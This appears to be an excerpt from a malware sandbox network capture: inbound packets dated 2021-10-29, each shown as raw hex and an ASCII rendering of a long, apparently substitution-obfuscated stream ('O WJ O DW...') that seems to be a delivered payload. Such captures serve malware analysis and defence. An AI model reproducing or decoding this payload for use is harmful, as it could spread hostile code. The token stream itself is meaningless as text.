2021-10-29 18:50:00 UTC	1081	IN	Data Raw: 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 6d 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 Data Ascii: O WJ O DW O XM O qqM O DD O qOX O DW O Eq O Xq O DW O XW O qOp O DD O mM O DW O Eq O WJ O DW O Ep O DW O DD O DX O DW O Eq O WD O DW O MX O qOp O DD O qOM O DW O Eq O qOE O DW O MO O qqM O DW O qOp O DW O DM O XM O DW O ME O Xq O DD O qqW O DW O Eq O XW
2021-10-29 18:50:00 UTC	1085	IN	Data Raw: 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 4d 4f 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 45 4f 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 44 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 4a 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 44 20 4f 20 Data Ascii: O qqW O DW O XW O qqM O DD O MO O DW O EO O EE O DW O XD O DW O DD O EO O DW O DM O mX O DW O Ep O DW O DD O XD O DW O EJ O EE O DW O MO O Xq O DD O qJq O DW O DD O qqM O DW O XD O Xq O DD O qJJ O DW O Eq O XW O DW O MM O qOp O DW O qOp O DW O Eq O WD O
2021-10-29 18:50:00 UTC	1089	IN	Data Raw: 44 57 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 71 4f 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 4d 4d 20 4f Data Ascii: DW O DW O MX O qqM O DD O qqE O DW O Eq O qqM O DW O qOq O Xq O DW O qOp O DW O EJ O Xq O DW O ME O DW O DD O qOX O DW O DE O DW O DW O MO O qOp O DD O qqX O DW O Eq O qqM O DW O MX O DW O DD O qqX O DW O EJ O MM O DW O ME O Xq O DD O qqE O DW O Eq O MM O
2021-10-29 18:50:00 UTC	1093	IN	Data Raw: 57 20 4f 20 45 6d 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 57 71 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 44 44 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f Data Ascii: W O Em O DW O EO O MM O DW O ME O Xq O DD O qqE O DW O Eq O Xq O DW O MX O qqM O DD O Wq O DW O EJ O EE O DW O Ep O DW O DW O WJ O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O EO O DD O DD O DW O DW O DW O DW O DW O
2021-10-29 18:50:00 UTC	1096	IN	Data Raw: 20 58 71 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 58 6d 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 45 4f 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 45 6d 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 58 6d 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 4f 4a 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 58 6d 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 57 44 20 4f 20 44 57 Data Ascii: Xq O DW O Ep O DW O EE O mX O DW O DW O DW O DW O XD O qOp O DD O Xm O DW O EO O WD O DW O XD O qOp O DD O EO O DW O EO O Ep O DW O XW O qqM O DD O Em O DW O DM O WD O DW O Xm O qOp O DD O qOJ O DW O DM O qOE O DW O Xm O qOp O DD O Eq O DW O DM O WD O DW
2021-10-29 18:50:00 UTC	1101	IN	Data Raw: 20 44 57 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 45 44 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 4f 44 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 58 6d 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 4f 6d 20 4f 20 44 57 20 4f Data Ascii: DW O Eq O WJ O DW O ED O qOp O DD O qOX O DW O EJ O qOp O DW O MO O Xq O DW O DW O DW O DX O qOp O DW O DX O DW O DW O DD O DW O EO O DW O DW O MM O qOp O DD O qqX O DW O Eq O Xq O DW O qOO O Xq O DD O qOD O DW O EJ O Xq O DW O Xm O qOp O DD O qOm O DW O
2021-10-29 18:50:00 UTC	1105	IN	Data Raw: 20 45 4a 20 4f 20 71 4f 6d 20 4f 20 71 71 44 20 4f 20 4d 58 20 4f 20 45 71 20 4f 20 57 70 20 4f 20 71 4a 4a 20 4f 20 58 4f 20 4f 20 58 70 20 4f 20 45 6d 20 4f 20 71 71 71 20 4f 20 71 4f 4f 20 4f 20 45 4a 20 4f 20 58 4a 20 4f 20 71 71 4d 20 4f 20 45 4d 20 4f 20 71 4f 57 20 4f 20 57 44 20 4f 20 71 71 58 20 4f 20 4d 4d 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 71 71 71 20 4f 20 4d 4f 20 4f 20 58 45 20 4f 20 6d 4d 20 4f 20 71 4f 6d 20 4f 20 4d 4d 20 4f 20 71 4a 71 20 4f 20 57 70 20 4f 20 71 71 44 20 4f 20 4d 45 20 4f 20 58 45 20 4f 20 45 58 20 4f 20 71 4a 71 20 4f 20 4d 58 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 71 71 58 20 4f 20 4d 4f 20 4f 20 71 71 4f 20 4f 20 58 71 20 4f 20 71 71 45 20 4f 20 58 4d 20 4f 20 57 4f 20 4f 20 57 45 20 4f 20 71 71 44 20 4f 20 45 44 Data Ascii: EJ O qOm O qqD O MX O Eq O Wp O qJJ O XO O Xp O Em O qqq O qOO O EJ O XJ O qqM O EM O qOW O WD O qqX O MM O WO O EX O qqq O MO O XE O mM O qOm O MM O qJq O Wp O qqD O ME O XE O EX O qJq O MX O Wq O EX O qqX O MO O qqO O Xq O qqE O XM O WO O WE O qqD O ED
2021-10-29 18:50:00 UTC	1109	IN	Data Raw: 57 70 20 4f 20 58 4d 20 4f 20 71 4a 71 20 4f 20 6d 4d 20 4f 20 71 4f 45 20 4f 20 45 58 20 4f 20 71 4f 44 20 4f 20 71 4f 58 20 4f 20 71 4f 45 20 4f 20 45 58 20 4f 20 45 71 20 4f 20 44 4d 20 4f 20 6d 58 20 4f 20 58 4d 20 4f 20 58 6d 20 4f 20 4d 4f 20 4f 20 71 4f 58 20 4f 20 45 45 20 4f 20 71 4a 4a 20 4f 20 71 4f 6d 20 4f 20 57 45 20 4f 20 45 70 20 4f 20 71 4f 44 20 4f 20 57 4a 20 4f 20 57 44 20 4f 20 45 44 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 6d 4d 20 4f 20 4d 4d 20 4f 20 45 4a 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 4d 4d 20 4f 20 71 71 4f 20 4f 20 58 4a 20 4f 20 71 4f 58 20 4f 20 4d 4f 20 4f 20 44 4d 20 4f 20 57 45 20 4f 20 58 6d 20 4f 20 58 4f 20 4f 20 71 4f 70 20 4f 20 6d 58 20 4f 20 45 57 20 4f 20 44 45 20 4f 20 58 6d 20 4f 20 71 71 4d 20 4f 20 71 Data Ascii: Wp O XM O qJq O mM O qOE O EX O qOD O qOX O qOE O EX O Eq O DM O mX O XM O Xm O MO O qOX O EE O qJJ O qOm O WE O Ep O qOD O WJ O WD O ED O Wq O EX O mM O MM O EJ O DD O qqX O MM O qqO O XJ O qOX O MO O DM O WE O Xm O XO O qOp O mX O EW O DE O Xm O qqM O q
2021-10-29 18:50:00 UTC	1113	IN	Data Raw: 71 4f 4f 20 4f 20 45 71 20 4f 20 58 44 20 4f 20 71 4f 45 20 4f 20 45 45 20 4f 20 58 70 20 4f 20 58 71 20 4f 20 71 71 4d 20 4f 20 45 70 20 4f 20 71 4f 70 20 4f 20 58 4d 20 4f 20 44 58 20 4f 20 58 44 20 4f 20 58 71 20 4f 20 58 71 20 4f 20 44 58 20 4f 20 44 4d 20 4f 20 71 4a 4f 20 4f 20 71 71 44 20 4f 20 58 6d 20 4f 20 4d 4f 20 4f 20 58 45 20 4f 20 45 58 20 4f 20 6d 58 20 4f 20 4d 45 20 4f 20 58 45 20 4f 20 71 4f 4f 20 4f 20 71 71 58 20 4f 20 45 70 20 4f 20 45 4f 20 4f 20 45 6d 20 4f 20 58 6d 20 4f 20 58 71 20 4f 20 58 70 20 4f 20 44 44 20 4f 20 44 58 20 4f 20 4d 58 20 4f 20 57 4f 20 4f 20 58 4a 20 4f 20 71 4f 58 20 4f 20 45 70 20 4f 20 45 4f 20 4f 20 45 58 20 4f 20 71 71 4a 20 4f 20 4d 4f 20 4f 20 57 4f 20 4f 20 57 70 20 4f 20 71 71 4a 20 4f 20 4d 58 20 4f Data Ascii: qOO O Eq O XD O qOE O EE O Xp O Xq O qqM O Ep O qOp O XM O DX O XD O Xq O Xq O DX O DM O qJO O qqD O Xm O MO O XE O EX O mX O ME O XE O qOO O qqX O Ep O EO O Em O Xm O Xq O Xp O DD O DX O MX O WO O XJ O qOX O Ep O EO O EX O qqJ O MO O WO O Wp O qqJ O MX O
2021-10-29 18:50:00 UTC	1117	IN	Data Raw: 4d 20 4f 20 44 44 20 4f 20 44 44 20 4f 20 58 71 20 4f 20 58 57 20 4f 20 45 4a 20 4f 20 44 57 20 4f 20 71 71 4d 20 4f 20 45 45 20 4f 20 71 71 4d 20 4f 20 44 4d 20 4f 20 58 71 20 4f 20 58 4d 20 4f 20 45 6d 20 4f 20 58 4d 20 4f 20 45 70 20 4f 20 4d 4f 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 4d 58 20 4f 20 57 4a 20 4f 20 58 71 20 4f 20 71 4f 70 20 4f 20 44 4d 20 4f 20 44 44 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 58 71 20 4f 20 58 71 20 4f 20 45 45 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 6d 4d 20 4f 20 58 57 20 4f 20 71 4f 4f 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 57 70 20 4f 20 45 45 20 4f 20 44 58 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 Data Ascii: M O DD O DD O Xq O XW O EJ O DW O qqM O EE O qqM O DM O Xq O XM O Em O XM O Ep O MO O Ep O DW O XM O MX O WJ O Xq O qOp O DM O DD O DD O DW O Xq O DX O DW O qOp O Xq O Xq O EE O DM O DW O Eq O DW O mM O XW O qOO O Ep O DW O Xq O Wp O EE O DX O MM O qqM O
2021-10-29 18:50:00 UTC	1121	IN	Data Raw: 20 44 57 20 4f 20 71 4f 4f 20 4f 20 71 71 71 20 4f 20 71 4f 45 20 4f 20 71 4f 70 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 57 70 20 4f 20 71 71 57 20 4f 20 71 4f 4d 20 4f 20 45 71 20 4f 20 45 58 20 4f 20 44 45 20 4f 20 44 45 20 4f 20 57 4a 20 4f 20 45 6d 20 4f 20 4d 4f 20 4f 20 57 45 20 4f 20 45 45 20 4f 20 57 45 20 4f 20 45 58 20 4f 20 71 71 70 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 6d 58 20 4f 20 45 71 20 4f 20 44 45 20 4f 20 58 70 20 4f 20 71 71 70 20 4f 20 45 71 20 4f 20 58 70 20 4f 20 45 70 20 4f 20 4d 58 20 4f 20 57 71 20 4f 20 44 58 20 4f 20 58 71 20 4f 20 44 4d 20 4f 20 44 44 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 45 70 20 4f 20 45 71 20 4f 20 45 70 20 4f 20 45 45 20 4f 20 58 71 20 4f 20 71 71 57 20 4f Data Ascii: DW O qOO O qqq O qOE O qOp O qqM O MX O Wp O qqW O qOM O Eq O EX O DE O DE O WJ O Em O MO O WE O EE O WE O EX O qqp O EE O DW O mX O Eq O DE O Xp O qqp O Eq O Xp O Ep O MX O Wq O DX O Xq O DM O DD O DX O DW O XW O DW O EE O Ep O Eq O Ep O EE O Xq O qqW O
2021-10-29 18:50:00 UTC	1125	IN	Data Raw: 71 71 20 4f 20 71 71 71 20 4f 20 58 4a 20 4f 20 44 58 20 4f 20 71 4f 4f 20 4f 20 57 44 20 4f 20 45 71 20 4f 20 45 6d 20 4f 20 45 6d 20 4f 20 58 44 20 4f 20 57 45 20 4f 20 44 58 20 4f 20 57 6d 20 4f 20 71 4f 71 20 4f 20 71 4f 6d 20 4f 20 71 4f 4a 20 4f 20 44 58 20 4f 20 71 71 6d 20 4f 20 4d 45 20 4f 20 71 4f 6d 20 4f 20 71 4f 44 20 4f 20 58 44 20 4f 20 71 4f 6d 20 4f 20 6d 58 20 4f 20 71 71 4d 20 4f 20 45 70 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 71 20 4f 20 57 4a 20 4f 20 45 70 20 4f 20 44 44 20 4f 20 4d 4f 20 4f 20 44 58 20 4f 20 44 45 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 58 45 20 4f 20 44 57 20 4f 20 71 71 4d 20 4f 20 45 4a 20 4f 20 71 71 4d 20 4f 20 58 4d 20 4f 20 44 58 20 4f 20 58 44 20 4f 20 58 4a Data Ascii: qq O qqq O XJ O DX O qOO O WD O Eq O Em O Em O XD O WE O DX O Wm O qOq O qOm O qOJ O DX O qqm O ME O qOm O qOD O XD O qOm O mX O qqM O Ep O DX O DW O Xq O DW O DD O qqq O WJ O Ep O DD O MO O DX O DE O DE O DW O XE O DW O qqM O EJ O qqM O XM O DX O XD O XJ
2021-10-29 18:50:00 UTC	1128	IN	Data Raw: 4f 20 44 58 20 4f 20 6d 58 20 4f 20 4d 58 20 4f 20 71 71 57 20 4f 20 57 44 20 4f 20 6d 58 20 4f 20 4d 4f 20 4f 20 71 4f 71 20 4f 20 58 71 20 4f 20 44 4d 20 4f 20 4d 45 20 4f 20 45 6d 20 4f 20 44 4d 20 4f 20 71 71 58 20 4f 20 58 71 20 4f 20 45 44 20 4f 20 71 4f 4f 20 4f 20 6d 4d 20 4f 20 71 71 70 20 4f 20 4d 4d 20 4f 20 45 57 20 4f 20 71 4f 45 20 4f 20 44 4d 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 45 58 20 4f 20 4d 58 20 4f 20 6d 58 20 4f 20 57 6d 20 4f 20 6d 70 20 4f 20 71 4f 4a 20 4f 20 57 71 20 4f 20 45 4f 20 4f 20 4d 4f 20 4f 20 58 57 20 4f 20 71 4a 4a 20 4f 20 71 71 4d 20 4f 20 57 6d 20 4f 20 45 71 20 4f 20 44 58 20 4f 20 45 57 20 4f 20 45 44 20 4f 20 71 4f 4a 20 4f 20 71 4f 71 20 4f 20 45 44 20 4f 20 6d 70 20 4f 20 58 70 20 4f 20 58 57 20 4f 20 57 45 Data Ascii: O DX O mX O MX O qqW O WD O mX O MO O qOq O Xq O DM O ME O Em O DM O qqX O Xq O ED O qOO O mM O qqp O MM O EW O qOE O DM O Wm O mE O EX O MX O mX O Wm O mp O qOJ O Wq O EO O MO O XW O qJJ O qqM O Wm O Eq O DX O EW O ED O qOJ O qOq O ED O mp O Xp O XW O WE
2021-10-29 18:50:00 UTC	1133	IN	Data Raw: 4f 20 4d 45 20 4f 20 58 45 20 4f 20 71 4f 4f 20 4f 20 71 71 45 20 4f 20 4d 45 20 4f 20 58 45 20 4f 20 57 70 20 4f 20 71 71 4f 20 4f 20 45 70 20 4f 20 44 4d 20 4f 20 45 58 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 71 4f 6d 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 57 45 20 4f 20 57 6d 20 4f 20 44 45 20 4f 20 71 71 4f 20 4f 20 45 45 20 4f 20 45 45 20 4f 20 71 4f 6d 20 4f 20 57 45 20 4f 20 71 4f 58 20 4f 20 45 45 20 4f 20 57 4f 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 71 71 45 20 4f 20 58 4f 20 4f 20 71 71 70 20 4f 20 71 4f 4a 20 4f 20 57 4f 20 4f 20 58 4d 20 4f 20 4d 58 20 4f 20 71 71 44 20 4f 20 71 4a 4a 20 4f 20 44 57 20 4f 20 45 58 20 4f 20 44 44 20 4f 20 71 4f 70 20 4f 20 71 4f 58 20 4f 20 71 4f 70 20 4f 20 71 4f 6d 20 4f 20 71 4f 45 20 4f 20 71 4f 70 20 4f 20 Data Ascii: O ME O XE O qOO O qqE O ME O XE O Wp O qqO O Ep O DM O EX O DD O DW O qOm O DM O DW O WE O Wm O DE O qqO O EE O EE O qOm O WE O qOX O EE O WO O DX O DW O qqE O XO O qqp O qOJ O WO O XM O MX O qqD O qJJ O DW O EX O DD O qOp O qOX O qOp O qOm O qOE O qOp O
2021-10-29 18:50:00 UTC	1137	IN	Data Raw: 20 45 45 20 4f 20 71 4f 45 20 4f 20 57 71 20 4f 20 71 71 45 20 4f 20 71 4a 4a 20 4f 20 6d 70 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 71 4f 6d 20 4f 20 58 4a 20 4f 20 58 4f 20 4f 20 71 4f 45 20 4f 20 71 4f 70 20 4f 20 71 4a 4a 20 4f 20 6d 70 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 57 4f 20 4f 20 57 4a 20 4f 20 58 71 20 4f 20 45 6d 20 4f 20 71 71 6d 20 4f 20 45 4a 20 4f 20 58 6d 20 4f 20 4d 45 20 4f 20 45 71 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 57 4a 20 4f 20 58 4f 20 4f 20 58 4d 20 4f 20 71 71 57 20 4f 20 58 71 20 4f 20 71 71 57 20 4f 20 58 4a 20 4f 20 71 71 58 20 4f 20 71 4a 4f 20 4f 20 71 4f 70 20 4f 20 58 4f 20 4f 20 45 45 20 4f 20 71 4f 44 20 4f 20 44 57 20 4f 20 71 4a 71 20 4f 20 45 45 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 57 4a 20 4f 20 45 45 20 4f Data Ascii: EE O qOE O Wq O qqE O qJJ O mp O WD O DW O qOm O XJ O XO O qOE O qOp O qJJ O mp O DD O DW O WO O WJ O Xq O Em O qqm O EJ O Xm O ME O Eq O Eq O XW O WJ O XO O XM O qqW O Xq O qqW O XJ O qqX O qJO O qOp O XO O EE O qOD O DW O qJq O EE O DX O DW O WJ O EE O
2021-10-29 18:50:00 UTC	1141	IN	Data Raw: 4f 20 71 4f 4d 20 4f 20 58 4a 20 4f 20 71 4f 70 20 4f 20 45 4a 20 4f 20 71 4f 58 20 4f 20 58 4a 20 4f 20 45 44 20 4f 20 45 58 20 4f 20 71 4f 4d 20 4f 20 45 57 20 4f 20 71 71 44 20 4f 20 57 44 20 4f 20 44 4d 20 4f 20 45 44 20 4f 20 71 4f 4d 20 4f 20 71 71 6d 20 4f 20 71 71 71 20 4f 20 45 57 20 4f 20 71 4f 57 20 4f 20 71 71 57 20 4f 20 6d 4d 20 4f 20 71 4f 4d 20 4f 20 58 6d 20 4f 20 71 71 4d 20 4f 20 45 4d 20 4f 20 45 44 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 57 20 4f 20 71 71 4d 20 4f 20 71 4a 71 20 4f 20 71 71 70 20 4f 20 71 71 45 20 4f 20 57 45 20 4f 20 57 4f 20 4f 20 57 44 20 4f 20 44 44 20 4f 20 58 4f 20 4f 20 44 4d 20 4f 20 71 4f 58 20 4f 20 57 57 20 4f 20 57 44 20 4f 20 44 45 20 4f 20 71 71 57 20 4f 20 71 4a 4a 20 4f 20 71 4f 57 20 4f 20 58 4a Data Ascii: O qOM O XJ O qOp O EJ O qOX O XJ O ED O EX O qOM O EW O qqD O WD O DM O ED O qOM O qqm O qqq O EW O qOW O qqW O mM O qOM O Xm O qqM O EM O ED O DW O MX O qqW O qqM O qJq O qqp O qqE O WE O WO O WD O DD O XO O DM O qOX O WW O WD O DE O qqW O qJJ O qOW O XJ
2021-10-29 18:50:00 UTC	1145	IN	Data Raw: 20 4f 20 44 45 20 4f 20 44 45 20 4f 20 71 71 57 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 58 57 20 4f 20 45 4f 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 45 45 20 4f 20 45 70 20 4f 20 45 45 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 6d 4d 20 4f 20 58 57 20 4f 20 71 4f 4f 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 57 70 20 4f 20 45 45 20 4f 20 44 58 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 45 58 20 4f 20 58 71 20 4f 20 58 4d 20 4f 20 45 45 20 4f 20 45 57 20 4f 20 71 71 4d 20 4f 20 58 4d 20 4f 20 44 44 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4a 71 20 4f 20 45 45 20 4f 20 58 71 20 4f 20 44 4d 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 45 45 20 4f 20 45 70 20 4f 20 45 45 20 4f 20 44 Data Ascii: O DE O DE O qqW O Eq O DW O Xq O XW O EO O DD O qqM O EE O Ep O EE O DM O DW O Eq O DW O mM O XW O qOO O Ep O DW O Xq O Wp O EE O DX O MM O qqM O EX O Xq O XM O EE O EW O qqM O XM O DD O DD O DW O Eq O qJq O EE O Xq O DM O DE O DW O Xq O EE O Ep O EE O D
2021-10-29 18:50:00 UTC	1149	IN	Data Raw: 20 71 4f 70 20 4f 20 45 4d 20 4f 20 57 4a 20 4f 20 58 44 20 4f 20 71 4f 4d 20 4f 20 58 44 20 4f 20 45 70 20 4f 20 44 58 20 4f 20 71 71 58 20 4f 20 45 4a 20 4f 20 71 4a 4f 20 4f 20 71 71 6d 20 4f 20 6d 4d 20 4f 20 57 44 20 4f 20 4d 4f 20 4f 20 71 71 45 20 4f 20 71 71 4d 20 4f 20 71 71 71 20 4f 20 58 70 20 4f 20 71 4f 4f 20 4f 20 57 45 20 4f 20 71 71 57 20 4f 20 71 71 45 20 4f 20 4d 4d 20 4f 20 45 44 20 4f 20 71 4a 4a 20 4f 20 6d 45 20 4f 20 58 4d 20 4f 20 71 71 44 20 4f 20 71 71 4f 20 4f 20 45 4f 20 4f 20 71 4f 70 20 4f 20 58 6d 20 4f 20 71 4f 58 20 4f 20 45 57 20 4f 20 71 4f 4d 20 4f 20 45 71 20 4f 20 6d 45 20 4f 20 44 4d 20 4f 20 58 44 20 4f 20 58 70 20 4f 20 71 71 71 20 4f 20 71 4f 57 20 4f 20 71 4f 6d 20 4f 20 71 71 44 20 4f 20 71 4f 4a 20 4f 20 57 71 Data Ascii: qOp O EM O WJ O XD O qOM O XD O Ep O DX O qqX O EJ O qJO O qqm O mM O WD O MO O qqE O qqM O qqq O Xp O qOO O WE O qqW O qqE O MM O ED O qJJ O mE O XM O qqD O qqO O EO O qOp O Xm O qOX O EW O qOM O Eq O mE O DM O XD O Xp O qqq O qOW O qOm O qqD O qOJ O Wq
2021-10-29 18:50:00 UTC	1153	IN	Data Raw: 20 71 4a 4a 20 4f 20 57 6d 20 4f 20 44 57 20 4f 20 6d 70 20 4f 20 58 57 20 4f 20 6d 70 20 4f 20 6d 70 20 4f 20 71 4a 4a 20 4f 20 58 45 20 4f 20 71 71 57 20 4f 20 44 44 20 4f 20 57 4f 20 4f 20 6d 4d 20 4f 20 71 4f 6d 20 4f 20 71 71 71 20 4f 20 44 4d 20 4f 20 71 71 4a 20 4f 20 4d 4d 20 4f 20 57 70 20 4f 20 45 4a 20 4f 20 71 4f 70 20 4f 20 57 57 20 4f 20 58 58 20 4f 20 71 71 6d 20 4f 20 71 4a 4f 20 4f 20 45 45 20 4f 20 71 4a 4f 20 4f 20 45 6d 20 4f 20 45 58 20 4f 20 45 45 20 4f 20 71 71 58 20 4f 20 71 4a 4a 20 4f 20 58 4a 20 4f 20 58 45 20 4f 20 58 45 20 4f 20 57 70 20 4f 20 6d 70 20 4f 20 4d 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 45 20 4f 20 45 4f 20 4f 20 71 4f 57 20 4f 20 58 4d 20 4f 20 45 6d 20 4f 20 6d 70 20 4f 20 57 45 20 4f 20 58 57 20 4f 20 71 4a 71 20 Data Ascii: qJJ O Wm O DW O mp O XW O mp O mp O qJJ O XE O qqW O DD O WO O mM O qOm O qqq O DM O qqJ O MM O Wp O EJ O qOp O WW O XX O qqm O qJO O EE O qJO O Em O EX O EE O qqX O qJJ O XJ O XE O XE O Wp O mp O ME O qOO O qOE O EO O qOW O XM 